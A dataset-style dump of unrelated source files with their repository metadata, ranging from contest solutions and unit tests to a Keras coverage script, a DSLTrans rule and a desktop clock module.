check = [[[-1 for row in range(5)] for col in range(5)] for height in range(5)]
check[0][0][0] = 0
while q:
cx, cy, cz = q.popleft()
for dx, dy, dz in direction:
nx,ny,nz = cx+dx, cy+dy, cz+dz
if range_check(nx, ny, nz) == False : continue
if check[nx][ny][nz] != -1 or temp[nx][ny][nz] == 0: continue
check[nx][ny][nz] = check[cx][cy][cz] +1
if check[nx][ny][nz] >= ret: return
q.append((nx,ny,nz))
if check[4][4][4] == -1: return
ret = min(ret, check[4][4][4])
if ret == 12: print(12); exit(0)
return
def solve(per):
global ret
v = [[[0 for row in range(5)] for col in range(5)] for height in range(5)]
for index,height in enumerate(per):
for row in range(5):
for col in range(5):
v[index][row][col] = board[height][row][col]
for i in range(4):
v = rotate(v,0)
for j in range(4):
v = rotate(v,1)
for k in range(4):
v = rotate(v,2)
for l in range(4):
v = rotate(v,3)
for m in range(4):
v = rotate(v,4)
bfs(v)
return
board = []
direction = [(0,0,1), (0,0,-1), (1,0,0), (-1,0,0) , (0,1,0) , (0,-1,0)]
for height in range(5):
floor = []
for row in range(5):
floor.append(list(map(int,input().split())))
board.append(floor)
for data in list(permutations([i for i in range(5)],5)):
solve(data)
if ret == int(1e9): ret = -1
print(ret)
|
[
"noreply@github.com"
] |
seoljeongwoo.noreply@github.com
|
c962789a0d7a79b73036d4123cbdfae8ad0b8b3e
|
bfe6c95fa8a2aae3c3998bd59555583fed72900a
|
/reachNumber.py
|
c529cd721779f2e52f7d23adbc52206920abdac0
|
[] |
no_license
|
zzz136454872/leetcode
|
f9534016388a1ba010599f4771c08a55748694b2
|
b5ea6c21bff317884bdb3d7e873aa159b8c30215
|
refs/heads/master
| 2023-09-01T17:26:57.624117
| 2023-08-29T03:18:56
| 2023-08-29T03:18:56
| 240,464,565
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 386
|
py
|
class Solution:
def reachNumber(self, target: int) -> int:
k = 0
s = 0
target = abs(target)
while s < target:
k += 1
s += k
d = s - target
if d % 2 == 0:
return k
k += 1
if (k - d) % 2 != 0:
k += 1
return k
target = 2
print(Solution().reachNumber(target))
|
[
"zzz136454872@163.com"
] |
zzz136454872@163.com
|
5e24b2565a618ba55d6cd3076b1e53d6d810773b
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02615/s526468670.py
|
459df95840e8558c1521ce47d258b9055f356cf3
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 161
|
py
|
n = int(input())
la = list(map(int, input().split()))
la.sort(reverse=True)
answer = la[0]
for i in range(n - 2):
answer += la[1 + i // 2]
print(answer)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
58d5dca55a3bf9e020bcac0e1af8db7b09471366
|
2f64dddf0d5df9df42b1c93d8f946c788d19fef0
|
/scruffy/env.py
|
d760d1cfc7f78a3af7918160f96c5a9756ae2065
|
[] |
no_license
|
tmr232/scruffy
|
41d2598d0b15b8eefd8ab038b1411eb8c384b836
|
3c35369a5a7b67e934d59c321439e3d3e5495970
|
refs/heads/master
| 2021-01-17T14:18:58.418097
| 2015-02-26T11:52:25
| 2015-02-26T11:52:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,835
|
py
|
import os
import yaml
import itertools
import errno
import logging
import logging.config
from .directory import Directory
from .plugin import PluginManager
from .config import ConfigNode, Config, ConfigEnv, ConfigApplicator
class Environment(object):
"""
An environment in which to run a program
"""
def __init__(self, setup_logging=True, *args, **kwargs):
self._pm = PluginManager()
self._children = {}
self.config = None
# find a config if we have one and load it
self.config = self.find_config(kwargs)
if self.config:
self.config.load()
# setup logging
if setup_logging:
if self.config != None and self.config.logging.dict_config != None:
# configure logging from the configuration
logging.config.dictConfig(self.config.logging.dict_config.to_dict())
else:
# no dict config, set up a basic config so we at least get messages logged to stdout
log = logging.getLogger()
log.setLevel(logging.INFO)
if len(list(filter(lambda h: isinstance(h, logging.StreamHandler), log.handlers))) == 0:
log.addHandler(logging.StreamHandler())
# add children
self.add(**kwargs)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.cleanup()
def __getitem__(self, key):
return self._children[key]
def __getattr__(self, key):
return self._children[key]
def find_config(self, children):
"""
Find a config in our children so we can fill in variables in our other
children with its data.
"""
named_config = None
found_config = None
# first see if we got a kwarg named 'config', as this guy is special
if 'config' in children:
if type(children['config']) == str:
children['config'] = ConfigFile(children['config'])
elif isinstance(children['config'], Config):
children['config'] = children['config']
elif type(children['config']) == dict:
children['config'] = Config(data=children['config'])
else:
raise TypeError("Don't know how to turn {} into a Config".format(type(children['config'])))
named_config = children['config']
# next check the other kwargs
for k in children:
if isinstance(children[k], Config):
found_config = children[k]
# if we still don't have a config, see if there's a directory with one
for k in children:
if isinstance(children[k], Directory):
for j in children[k]._children:
if j == 'config' and not named_config:
named_config = children[k]._children[j]
if isinstance(children[k]._children[j], Config):
found_config = children[k]._children[j]
if named_config:
return named_config
else:
return found_config
def add(self, **kwargs):
"""
Add objects to the environment.
"""
for key in kwargs:
if type(kwargs[key]) == str:
self._children[key] = Directory(kwargs[key])
else:
self._children[key] = kwargs[key]
self._children[key]._env = self
self._children[key].apply_config(ConfigApplicator(self.config))
self._children[key].prepare()
def cleanup(self):
"""
Clean up the environment
"""
for key in self._children:
self._children[key].cleanup()
@property
def plugins(self):
return self._pm.plugins
|
[
"snare@ho.ax"
] |
snare@ho.ax
|
8e6ddac527a835923457ffb56b86e80403bcc21e
|
c672675d505f1b0dafb4b81141644caedf24cdef
|
/CADRE/power_dymos/power_cell_voltage.py
|
1190bedce22ea57736456b93baa146f986dc045b
|
[
"Apache-2.0"
] |
permissive
|
johnjasa/CADRE
|
aa63c7fa9466dc1839b454f2484346e57204dc8a
|
a4ffd61582b8474953fc309aa540838a14f29dcf
|
refs/heads/master
| 2020-04-07T03:19:57.501186
| 2018-11-17T19:15:10
| 2018-11-17T19:15:10
| 158,012,106
| 0
| 0
|
Apache-2.0
| 2018-11-17T18:17:53
| 2018-11-17T18:17:53
| null |
UTF-8
|
Python
| false
| false
| 4,874
|
py
|
"""
Power discipline for CADRE: Power Cell Voltage component.
"""
from __future__ import print_function, division, absolute_import
from six.moves import range
import os
import numpy as np
from openmdao.api import ExplicitComponent
from MBI import MBI
class PowerCellVoltage(ExplicitComponent):
"""
Compute the output voltage of the solar panels.
"""
def initialize(self):
fpath = os.path.dirname(os.path.realpath(__file__))
self.options.declare('num_nodes', types=(int, ),
desc="Number of time points.")
self.options.declare('filename', fpath + '/../data/Power/curve.dat',
desc="File containing surrogate model for voltage.")
def setup(self):
nn = self.options['num_nodes']
filename = self.options['filename']
dat = np.genfromtxt(filename)
nT, nA, nI = dat[:3]
nT = int(nT)
nA = int(nA)
nI = int(nI)
T = dat[3:3 + nT]
A = dat[3 + nT:3 + nT + nA]
I = dat[3 + nT + nA:3 + nT + nA + nI] # noqa: E741
V = dat[3 + nT + nA + nI:].reshape((nT, nA, nI), order='F')
self.MBI = MBI(V, [T, A, I], [6, 6, 15], [3, 3, 3])
self.x = np.zeros((84 * nn, 3), order='F')
self.xV = self.x.reshape((nn, 7, 12, 3), order='F')
# Inputs
self.add_input('LOS', np.zeros((nn, )), units=None,
desc='Line of Sight over Time')
self.add_input('temperature', np.zeros((nn, 5)), units='degK',
desc='Temperature of solar cells over time')
self.add_input('exposed_area', np.zeros((nn, 7, 12)), units='m**2',
desc='Exposed area to sun for each solar cell over time')
self.add_input('Isetpt', np.zeros((nn, 12)), units='A',
desc='Currents of the solar panels')
# Outputs
self.add_output('V_sol', np.zeros((nn, 12)), units='V',
desc='Output voltage of solar panel over time')
rows = np.arange(nn*12)
cols = np.tile(np.repeat(0, 12), nn) + np.repeat(np.arange(nn), 12)
self.declare_partials('V_sol', 'LOS', rows=rows, cols=cols)
row = np.tile(np.repeat(0, 5), 12) + np.repeat(np.arange(12), 5)
rows = np.tile(row, nn) + np.repeat(12*np.arange(nn), 60)
col = np.tile(np.arange(5), 12)
cols = np.tile(col, nn) + np.repeat(5*np.arange(nn), 60)
self.declare_partials('V_sol', 'temperature', rows=rows, cols=cols)
row = np.tile(np.arange(12), 7)
rows = np.tile(row, nn) + np.repeat(12*np.arange(nn), 84)
cols = np.arange(nn*7*12)
self.declare_partials('V_sol', 'exposed_area', rows=rows, cols=cols)
row_col = np.arange(nn*12)
self.declare_partials('V_sol', 'Isetpt', rows=row_col, cols=row_col)
def setx(self, inputs):
temperature = inputs['temperature']
LOS = inputs['LOS']
exposed_area = inputs['exposed_area']
Isetpt = inputs['Isetpt']
for p in range(12):
i = 4 if p < 4 else (p % 4)
for c in range(7):
self.xV[:, c, p, 0] = temperature[:, i]
self.xV[:, c, p, 1] = LOS * exposed_area[:, c, p]
self.xV[:, c, p, 2] = Isetpt[:, p]
def compute(self, inputs, outputs):
"""
Calculate outputs.
"""
nn = self.options['num_nodes']
self.setx(inputs)
self.raw = self.MBI.evaluate(self.x)[:, 0].reshape((nn, 7, 12), order='F')
outputs['V_sol'] = np.zeros((nn, 12))
for c in range(7):
outputs['V_sol'] += self.raw[:, c, :]
def compute_partials(self, inputs, partials):
"""
Calculate and save derivatives. (i.e., Jacobian)
"""
nn = self.options['num_nodes']
exposed_area = inputs['exposed_area']
LOS = inputs['LOS']
raw1 = self.MBI.evaluate(self.x, 1)[:, 0].reshape((nn, 7, 12), order='F')
raw2 = self.MBI.evaluate(self.x, 2)[:, 0].reshape((nn, 7, 12), order='F')
raw3 = self.MBI.evaluate(self.x, 3)[:, 0].reshape((nn, 7, 12), order='F')
dV_dL = np.empty((nn, 12))
dV_dT = np.zeros((nn, 12, 5))
dV_dA = np.zeros((nn, 7, 12))
dV_dI = np.empty((nn, 12))
for p in range(12):
i = 4 if p < 4 else (p % 4)
for c in range(7):
dV_dL[:, p] += raw2[:, c, p] * exposed_area[:, c, p]
dV_dT[:, p, i] += raw1[:, c, p]
dV_dA[:, c, p] += raw2[:, c, p] * LOS
dV_dI[:, p] += raw3[:, c, p]
partials['V_sol', 'LOS'] = dV_dL.flatten()
partials['V_sol', 'temperature'] = dV_dT.flatten()
partials['V_sol', 'exposed_area'] = dV_dA.flatten()
partials['V_sol', 'Isetpt'] = dV_dI.flatten()
|
[
"kenneth.t.moore-1@nasa.gov"
] |
kenneth.t.moore-1@nasa.gov
|
950676821e3247a2de1ac3ab907345178473721e
|
69bfed466017c654c5d24a3e735430c4dc138af4
|
/src/settings.py
|
fc9c4e70c37f0bca34b88ed0a4c3fc0d16a4d2e2
|
[
"MIT"
] |
permissive
|
kartagis/lucy
|
20579fe1776cb6a2cfda2c26212d3d63be8829be
|
45de24c0b01dfb9329eb31a1bd705df5b26e84a3
|
refs/heads/master
| 2021-01-23T15:27:20.420914
| 2017-09-07T08:08:14
| 2017-09-07T08:08:14
| 102,708,901
| 0
| 0
| null | 2017-09-07T08:00:34
| 2017-09-07T08:00:34
| null |
UTF-8
|
Python
| false
| false
| 397
|
py
|
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
db_name = "db/filop.db"
Base = declarative_base()
def session(db_name = db_name):
engine = create_engine('sqlite:///{}'.format(db_name))
session = sessionmaker()
session.configure(bind=engine)
Base.metadata.create_all(engine)
return session()
|
[
"hakancelik96@outlook.com"
] |
hakancelik96@outlook.com
|
ddfa181471cceb2fcfaedc2db33679d4f3c3ae67
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/renderer/core/url_pattern/DEPS
|
7c671850403fe157f8234a4a1b325f2ab5b091ee
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 277
|
# Copyright 2020 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
include_rules = [
"+base/strings/string_util.h",
"+third_party/liburlpattern",
"+url/url_canon.h",
"+url/url_util.h",
]
|
[
"chromium-scoped@luci-project-accounts.iam.gserviceaccount.com"
] |
chromium-scoped@luci-project-accounts.iam.gserviceaccount.com
|
|
e45f74a36ee23641f9d7cd1fdf8a4ba8f9a3e067
|
af3ec207381de315f4cb6dddba727d16d42d6c57
|
/dialogue-engine/test/programytest/processors/post/test_mergechinese.py
|
94679d64e47a6074fb113389ea20ae7e01be2ae1
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mcf-yuichi/cotoba-agent-oss
|
02a5554fe81ce21517f33229101013b6487f5404
|
ce60833915f484c4cbdc54b4b8222d64be4b6c0d
|
refs/heads/master
| 2023-01-12T20:07:34.364188
| 2020-11-11T00:55:16
| 2020-11-11T00:55:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,284
|
py
|
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
from programy.processors.post.mergechinese import MergeChinesePostProcessor
from programy.context import ClientContext
from programytest.client import TestClient
class MergeChineseTests(unittest.TestCase):
def test_merge_chinese(self):
processor = MergeChinesePostProcessor()
context = ClientContext(TestClient(), "testid")
result = processor.process(context, "Hello")
self.assertIsNotNone(result)
self.assertEqual("Hello", result)
result = processor.process(context, "Hello World")
self.assertIsNotNone(result)
self.assertEqual("Hello World", result)
result = processor.process(context, "你 好")
self.assertIsNotNone(result)
self.assertEqual("你好", result)
result = processor.process(context, "问 你 好")
self.assertIsNotNone(result)
self.assertEqual("问你好", result)
result = processor.process(context, "XX 你 好")
self.assertIsNotNone(result)
self.assertEqual("XX 你好", result)
result = processor.process(context, "XX 你 好 YY")
self.assertIsNotNone(result)
self.assertEqual("XX 你好 YY", result)
|
[
"cliff@cotobadesign.com"
] |
cliff@cotobadesign.com
|
64b15f566dc2e930a5e0177cd01827d2c16d2e5e
|
59bd639757fd8afcfdba73298a69482fd1f88069
|
/cifar10/7_DenseNet/4last-output.py
|
95b854521d8ef455b564b73ffa226914c451d537
|
[] |
no_license
|
DeepReduce/DeepReduce
|
f1e14b985affba2796c80d9e795b36cfd4ed9a55
|
707c2b411d65ed77967a3d1ea1506a91cc9d4bfd
|
refs/heads/master
| 2020-08-01T01:47:23.293453
| 2020-06-14T18:09:01
| 2020-06-14T18:09:01
| 210,813,368
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,670
|
py
|
import keras
from keras import optimizers
from keras.datasets import cifar10
from keras.models import Sequential
from keras.layers import Conv2D, Dense, Flatten, MaxPooling2D
from keras.callbacks import LearningRateScheduler, TensorBoard
from keras.models import load_model
from collections import defaultdict
import numpy as np
def init_dict(model, model_layer_dict):
for layer in model.layers:
if 'flatten' in layer.name or 'input' in layer.name:
continue
for index in range(layer.output_shape[-1]):
model_layer_dict[(layer.name, index)] = False
def update_coverage(input_data, model, model_layer_dict, threshold=0.2):
layer_names = [layer.name for layer in model.layers if
'flatten' not in layer.name and 'input' not in layer.name]
intermediate_layer_model = Model(inputs=model.input,
outputs=[model.get_layer(layer_name).output for layer_name in layer_names])
intermediate_layer_outputs = intermediate_layer_model.predict(input_data)
for i, intermediate_layer_output in enumerate(intermediate_layer_outputs):
scaled = scale(intermediate_layer_output[0])
for num_neuron in xrange(scaled.shape[-1]):
if np.mean(scaled[..., num_neuron]) > threshold and not model_layer_dict[(layer_names[i], num_neuron)]:
model_layer_dict[(layer_names[i], num_neuron)] = True
def neuron_covered(model_layer_dict):
covered_neurons = len([v for v in model_layer_dict.values() if v])
total_neurons = len(model_layer_dict)
return covered_neurons, total_neurons, covered_neurons / float(total_neurons)
def scale(intermediate_layer_output, rmax=1, rmin=0):
X_std = (intermediate_layer_output - intermediate_layer_output.min()) / (
intermediate_layer_output.max() - intermediate_layer_output.min())
X_scaled = X_std * (rmax - rmin) + rmin
return X_scaled
def color_preprocessing(x_train,x_test):
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
# mean = [125.307, 122.95, 113.865]
mean = [123.680, 116.779, 103.939]
# std = [62.9932, 62.0887, 66.7048]
for i in range(3):
x_train[:,:,:,i] = (x_train[:,:,:,i] - mean[i])
x_test[:,:,:,i] = (x_test[:,:,:,i] - mean[i])
return x_train, x_test
from keras import backend as K
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
if('tensorflow' == K.backend()):
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train, x_test = color_preprocessing(x_train, x_test)
model1 = load_model('densenet.h5')
print(model1.evaluate(x_test, y_test))
#print(model1.summary())
#input('check...')
#for layer in model1.layers:
#for index in range(layer.output_shape[-1]):
# print(layer.name)
# print(layer.output_shape)
#print(layer.name)
#print(layer.output_shape)
#print(layer.output_shape[-1])
#print('----------')
model_layer_dict1 = defaultdict(bool)
init_dict(model1,model_layer_dict1)
#print(model_layer_dict1)
#print(len(model_layer_dict1.keys()))
#test_image = x_test[0].reshape([1,32,32,3])
#test_image.shape
#res = model.predict(test_image)
#label = softmax_to_label(res)
#print(label)
#print(x_test[0])
#print(len(x_test[0]))
#print(len(x_test[0][0]))
from keras.models import Model
#threshold = float(0.5)
layer_names = [layer.name for layer in model1.layers if 'flatten' not in layer.name and 'input' not in layer.name]
#print(layer_names)
#input('check...')
#intermediate_layer_model = Model(inputs=model1.input,outputs=[model1.get_layer(layer_name).output for layer_name in layer_names])
intermediate_layer_model = Model(inputs=model1.input, outputs = [model1.get_layer(layer_names[-2]).output])
from tqdm import tqdm
cov = []
flag = 0
neuronlist = []
f = open('Cov/cross_entropy','w')
for g in tqdm(range(len(x_test))):
test_image = x_test[g].reshape([1,32,32,3])
intermediate_layer_outputs = intermediate_layer_model.predict(test_image)
#print(type(intermediate_layer_outputs[0]))
#print(intermediate_layer_outputs[0])
output = intermediate_layer_outputs[0].tolist()
#print(output)
#print(intermediate_layer_output[0])
#print(len(intermediate_layer_output[0]))
#input('pause...')
f.write(str(output) + '\n')
f.close()
|
[
"DLR_ICLR20@163.com"
] |
DLR_ICLR20@163.com
|
1e9c16e2b6d642eebb25c59fd0d5220331672fb8
|
324d8a723bc057b4679014a1a7df08a013f2e237
|
/torchpack/runner/hooks/logger.py
|
49251f01012a787560503cb09c3bb34fd5925422
|
[
"MIT"
] |
permissive
|
lxx1991/torchpack
|
ff0db24c73479b8d4e1bf77dd5fda4e5a3a7b694
|
3de04972bca89e0a4c53fa896a4f9f62457adc75
|
refs/heads/master
| 2020-03-24T04:05:14.299613
| 2018-07-26T13:52:38
| 2018-07-26T13:52:38
| 142,443,539
| 0
| 0
| null | 2018-07-26T13:17:29
| 2018-07-26T13:17:29
| null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
from .hook import Hook
class LoggerHook(Hook):
"""Base class for logger hooks."""
def __init__(self, interval=10, reset_meter=True, ignore_last=True):
self.interval = interval
self.reset_meter = reset_meter
self.ignore_last = ignore_last
def log(self, runner):
pass
def log_and_reset(self, runner):
self.log(runner)
if self.reset_meter:
runner.meter.reset()
def after_train_iter(self, runner):
if not self.every_n_inner_iters(runner, self.interval):
if not self.end_of_epoch(runner):
return
elif self.ignore_last:
return
self.log_and_reset(runner)
def after_val_epoch(self, runner):
self.log_and_reset(runner)
|
[
"chenkaidev@gmail.com"
] |
chenkaidev@gmail.com
|
2e5b6109e5a9caf2bc44433828a311f4a7bdbc4b
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5686313294495744_0/Python/jessethegame/technobabble.py
|
4dc584f7ee2f0b34adfcd5dd99e118b303b19b94
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,067
|
py
|
from collections import Counter
file = 'C-small-attempt0.in'
def technobabble(topics):
real_firsts = set()
real_seconds = set()
fakes = 0
while topics:
firsts, seconds = zip(*topics)
firsts_counter = Counter(firsts)
seconds_counter = Counter(seconds)
ranked_topics = [((firsts_counter[first] + seconds_counter[second]), first, second) for first, second in topics]
highest_first, highest_second = list(sorted(ranked_topics))[0][1:]
real_firsts.add(highest_first)
real_seconds.add(highest_second)
possible_fakes = len(topics) - 1
topics = [(first, second) for first, second in topics if not first in real_firsts or not second in real_seconds]
fakes += possible_fakes - len(topics)
return fakes
with open(file) as handle:
T = int(handle.readline())
for t in range(T):
N = int(handle.readline())
topics = []
for n in range(N):
topics.append(handle.readline().strip().split())
print "Case #{}: {}".format(t + 1, technobabble(topics))
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
c239e77199b80a12345eece29962351d9e9c9e3a
|
aa4024b6a846d2f6032a9b79a89d2e29b67d0e49
|
/mbeddr2C_MM/transformation_from_eclipse/Hlayer0rule10.py
|
bb1691eeceb274bc2e91c97bcfad803a7582cfba
|
[
"MIT"
] |
permissive
|
levilucio/SyVOLT
|
41311743d23fdb0b569300df464709c4954b8300
|
0f88827a653f2e9d3bb7b839a5253e74d48379dc
|
refs/heads/master
| 2023-08-11T22:14:01.998341
| 2023-07-21T13:33:36
| 2023-07-21T13:33:36
| 36,246,850
| 3
| 2
|
MIT
| 2023-07-21T13:33:39
| 2015-05-25T18:15:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,433
|
py
|
from core.himesis import Himesis
import uuid
class Hlayer0rule10(Himesis):
def __init__(self):
"""
Creates the himesis graph representing the DSLTrans rule layer0rule10.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(Hlayer0rule10, self).__init__(name='Hlayer0rule10', num_nodes=0, edges=[])
# Set the graph attributes
self["mm__"] = ['HimesisMM']
self["name"] = """layer0rule10"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'layer0rule10')
# match model. We only support one match model
self.add_node()
self.vs[0]["mm__"] = """MatchModel"""
# apply model node
self.add_node()
self.vs[1]["mm__"] = """ApplyModel"""
# paired with relation between match and apply models
self.add_node()
self.vs[2]["mm__"] = """paired_with"""
# match class RequiredPort(layer0rule10class0) node
self.add_node()
self.vs[3]["mm__"] = """RequiredPort"""
self.vs[3]["attr1"] = """+"""
# match_contains node for class RequiredPort(layer0rule10class0)
self.add_node()
self.vs[4]["mm__"] = """match_contains"""
# apply class Member(layer0rule10class1) node
self.add_node()
self.vs[5]["mm__"] = """Member"""
self.vs[5]["attr1"] = """1"""
# apply_contains node for class Member(layer0rule10class1)
self.add_node()
self.vs[6]["mm__"] = """apply_contains"""
# Add the edges
self.add_edges([
(0,4), # matchmodel -> match_contains
(4,3), # match_contains -> match_class RequiredPort(layer0rule10class0)
(1,6), # applymodel -> apply_contains
(6,5), # apply_contains -> apply_class Member(layer0rule10class1)
(0,2), # matchmodel -> pairedwith
(2,1) # pairedwith -> applyModel
])
# Add the attribute equations
self["equations"] = [((5,'name'),('concat',((3,'name'),('constant','__ops')))), ((5,'__ApplyAttribute'),('constant','RequiredPort_ops')), ]
|
[
"bentleyjoakes@gmail.com"
] |
bentleyjoakes@gmail.com
|
a865a4a19651e7b15a5546c69a0a6e8fd29a34e7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_206/1242.py
|
fb480c086828b23e6c6b68107084423f36d2c390
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 564
|
py
|
inputfile = open("h2.in", mode='r')
outputfile = open("output_h_l.txt", mode='w')
t = int(inputfile.readline().strip())
for case in range(t):
d, n = map(int, inputfile.readline().strip().split(' '))
time = 0
for i in range(n):
hD, hS = map(int, inputfile.readline().strip().split(' '))
hT = (d - hD) / hS
if hT > time:
time = hT
speed = d / time
outputfile.write("case #" + str(case + 1) + ": " + str(speed)+"\n")
print("case #" + str(case + 1) + ": " + str(speed))
outputfile.close()
inputfile.close()
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
01956a1d6ef57c28be46ff7304cfc60c0c562d05
|
98c6ea9c884152e8340605a706efefbea6170be5
|
/examples/data/Assignment_7/ndxren013/util.py
|
f7c3c9c8c6cfa0051e619ed357a02dcd81f8c0e5
|
[] |
no_license
|
MrHamdulay/csc3-capstone
|
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
|
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
|
refs/heads/master
| 2021-03-12T21:55:57.781339
| 2014-09-22T02:22:22
| 2014-09-22T02:22:22
| 22,372,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,152
|
py
|
import copy
def create_grid(grid) :
"""create a 4x4 grid"""
for i in range(4):
tmp = []
for j in range(4):
tmp.append(0)
grid.append(tmp)
def print_grid(grid) :
"""print out a 4x4 grid in 5-width columns within a box"""
print("+--------------------+")
for i in range (4):
print('|', end = '')
for j in range (4) :
if grid[i][j] == 0:
print (" " + " "*(5-(len(str(grid[i][j])))), end = "")
else :
print (str(grid[i][j]) + " "*(5-(len(str(grid[i][j])))), end = "")
print("|")
print("+--------------------+")
def check_lost(grid) :
"""return True if there are no 0 values and no adjacent values that are equal; otherwise False"""
flag = True
for i in range (4) :
for j in range(4) :
if grid[i][j] == 0 :
flag = False
if flag == True :
for i in range (0,4,1) :
for j in range (0,4,1) :
if i < 3 and j < 3:
if grid[i][j] == grid[i][j+1] or grid[i][j] == grid[i+1][j] :
flag = False
if i == 3 and j == 3:
continue
if i == 3:
if grid[i][j] == grid[i][j + 1]:
flag = False
if j == 3:
if grid[i][j] == grid[i + 1][j]:
flag = False
return flag
def check_won(grid) :
"""return True if a value >= 32 is found in the grid; otherwise False"""
flag = False
for i in range (4) :
for j in range (4) :
if grid[i][j] >= 32 :
flag = True
return flag
def copy_grid(grid) :
"""return a copy of the grid"""
return copy.deepcopy(grid)
def grid_equal(grid1, grid2) :
"""check if 2 grids are equal - return boolean value"""
if grid1 == grid2 :
return True
else:
return False
|
[
"jarr2000@gmail.com"
] |
jarr2000@gmail.com
|
71f69800aac7f2532c02268c353747e0fb1e2a77
|
ee2444e8e70f136e6b34a35eb55dc287a7621956
|
/clock/clocks.py
|
20fd7688ffe7775b14b7fed30fc4decad5af4c9f
|
[
"Apache-2.0"
] |
permissive
|
vyahello/desktop-clock
|
ec737c6e12273bc9f309e4dc921740b41e5fbef0
|
b9db67ef646db7951354842846e8b6baf03d3076
|
refs/heads/master
| 2020-04-14T03:12:13.643967
| 2019-01-06T22:10:00
| 2019-01-06T22:10:00
| 163,602,100
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,701
|
py
|
from abc import ABC, abstractmethod
from clock.environment.engines import Engine, ClockEngine
from clock.environment.time import Time, ClockTime
from clock.environment.widgets import Widget, PurpleUIWidget
from clock.environment.windows import Window
from clock.types import Runner
class Clock(ABC):
"""Represent abstraction of clock."""
@abstractmethod
def start(self) -> None:
"""Start running a clock."""
pass
@abstractmethod
def stop(self) -> None:
"""Stop running a clock."""
pass
class DigitalClock(Clock):
"""Unified digital clock."""
def __init__(self, name: str, time: Time, master: Window, widget: Widget) -> None:
self._name = name
self._master = master
self._widget = widget
self._engine: Engine = ClockEngine(time, widget)
def start(self) -> None:
self._master.set_title(self._name)
self._engine.run()
